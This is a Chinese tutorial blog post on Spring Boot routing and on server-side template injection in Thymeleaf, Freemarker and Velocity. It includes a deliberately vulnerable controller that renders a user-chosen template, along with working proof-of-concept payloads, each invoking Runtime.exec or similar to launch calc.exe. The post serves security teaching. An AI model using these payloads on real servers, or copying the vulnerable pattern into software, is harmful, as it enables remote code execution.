Web开发-JavaEE应用&SpringBoot栈&模版注入&Thymeleaf&Freemarker&Velocity

SuperherRo2025-05-01 13:21

知识点:

1、安全开发-JavaEE-开发框架-SpringBoot&路由&传参

2、安全开发-JavaEE-模版引擎-Thymeleaf&Freemarker&Velocity

一、演示案例-WEB开发-JavaEE-开发框架-SpringBoot&路由&传参

类似于php语言中的thinkphp,不过要更加优秀。

参考:https://springdoc.cn/spring-boot/













1、路由映射

bash 复制代码 
@RequestMapping @GetMapping等

2、参数传递

bash 复制代码 
@RequestParam

3、数据响应

bash 复制代码 
@RestController @Controller(请求)
@RestController注解相当于@ResponseBody(响应)+@Controller(请求)合作用。










二、演示案例-WEB开发-JavaEE-模版引擎-Thymeleaf&Freemarker&Velocity

Thymeleaf

参考:https://xz.aliyun.com/news/9962

1、新建SpringBoot项目包含Web,Thymeleaf



2、配置application.properties修改缓存

3、创建模版目录和文件,文件定义修改变量



4、新建Controller目录及文件,指定路由配置









5、更换SpringBoot及Thymeleaf版本测试POC

bash 复制代码 
@Controller
public class IndexController {
    @RequestMapping("/index")
    public String index(Model model) {
//替换模版html文件中的data变量值
model.addAttribute("data", "你好 小迪");
//使用index模版文件
        return "index";
    }




bash 复制代码 
    @RequestMapping("/indexs")
    public String index(Model model,@RequestParam String lang) {
//替换模版html文件中的data变量值
model.addAttribute("data", "Hello xiaodi");
//使用index+变量lang模版文件
        return "index-"+lang;
    }
}



bash 复制代码 
利用条件:Thymeleaf漏洞版本,可控渲染模版文件
Poc:__$%7bnew%20java.util.Scanner(T(java.lang.Runtime).getRuntime().exec(%22calc.exe%22).getInputStream()).next()%7d__::.x





Freemarker

参考:https://mp.weixin.qq.com/s/TtNxfSYsB4HMEpW_OBniew

1、新建SpringBoot项目包含Web,Freemarker



2、配置application.properties修改缓存

3、创建模版目录和文件,文件定义修改变量


4、新建Controller目录及文件,指定路由配置






5、更换SpringBoot及Freemarker版本测试POC

bash 复制代码 
 <#assign value="freemarker.template.utility.Execute"?new()>${value("calc.exe")}





bash 复制代码 
<#assign value="freemarker.template.utility.ObjectConstructor"?new()>${value("java.lang.ProcessBuilder","calc.exe").start()}

<#assign value="freemarker.template.utility.JythonRuntime"?new()>${value("calc.exe")}<@value>import os;os.system("calc.exe")</@value>//@value为自定义标签

利用条件:可控渲染的模版文件

Velocity


参考:https://blog.csdn.net/2401_83799022/article/details/141600988

bash 复制代码 
<dependency>
    <groupId>org.apache.velocity</groupId>
    <artifactId>velocity</artifactId>
    <version>1.7</version>
</dependency>



bash 复制代码 
Poc:%23set($e%3D"e")$e.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec("calc")
bash 复制代码 
利用条件:Velocity漏洞版本,可控模版变量或文件


相关推荐
JIngJaneIL2 小时前
基于java+ vue助农电商系统(源码+数据库+文档)
java·开发语言·前端·数据库·vue.js·spring boot·后端
q_19132846952 小时前
基于Springboot+MySQL+RuoYi的会议室预约管理系统
java·vue.js·spring boot·后端·mysql·若依·计算机毕业设计
VX:Fegn08953 小时前
计算机毕业设计|基于springboot + vue乡村振兴服务系统(源码+数据库+文档)
数据库·vue.js·spring boot·后端·课程设计
何中应4 小时前
Bean的三种注入方式
开发语言·spring boot·后端·spring
Lucky_Turtle5 小时前
【Springboot】解决PageHelper在实体转Vo下出现total数据问题
java·spring boot·后端
老华带你飞5 小时前
志愿者服务管理|基于springboot 志愿者服务管理系统(源码+数据库+文档)
java·数据库·vue.js·spring boot·后端·spring
汤姆yu5 小时前
基于springboot的宠物服务管理系统
java·spring boot·后端
利刃大大6 小时前
【SpringBoot】Spring IOC && DI && 五大注解 && Bean && 扫描路径 && 依赖注入
java·spring boot·spring
老华带你飞6 小时前
学生请假管理|基于springboot 学生请假管理系统(源码+数据库+文档)
java·前端·数据库·vue.js·spring boot·后端·spring
热门推荐
01GitHub 镜像站点02UV安装并设置国内源03Linux下V2Ray安装配置指南04BongoCat - 跨平台键盘猫动画工具05安娜的档案(Anna’s Archive) 镜像网站/国内最新可访问入口(持续更新)06jdk21下载、安装(Windows、Linux、macOS)07在VSCode配置Java开发环境的保姆级教程(适配各类AI编程IDE)08Open-AutoGLM Windows 安装部署教程09sqli-labs靶场通关笔记:第18-19关 HTTP头部注入10CentOS的ISO镜像下载